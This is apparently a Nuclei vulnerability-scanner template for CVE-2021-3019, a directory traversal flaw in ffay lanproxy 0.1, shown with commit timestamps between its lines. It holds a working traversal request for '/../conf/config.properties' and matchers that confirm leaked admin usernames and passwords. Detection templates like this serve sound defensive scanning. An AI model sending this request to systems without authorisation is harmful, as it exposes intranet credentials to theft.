2021-01-30 12:22:35 +00:00
id : CVE-2021-3019
info :
2022-04-07 13:53:15 +00:00
name : ffay lanproxy Directory Traversal
2021-01-30 12:22:35 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 06:48:11 +00:00
- https://github.com/ffay/lanproxy/commits/master
- https://github.com/maybe-why-not/lanproxy/issues/1
2022-04-07 13:53:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-3019
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-3019
cwe-id : CWE-22
2022-04-07 13:53:15 +00:00
tags : cve,cve2021,lanproxy,lfi
2021-01-30 12:22:35 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/../conf/config.properties"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "application/octet-stream"
condition : and
part : header
- type : word
words :
- "config.admin.username"
- "config.admin.password"
condition : and
part : body
2022-04-07 13:53:15 +00:00
# Enhanced by mp on 2022/04/04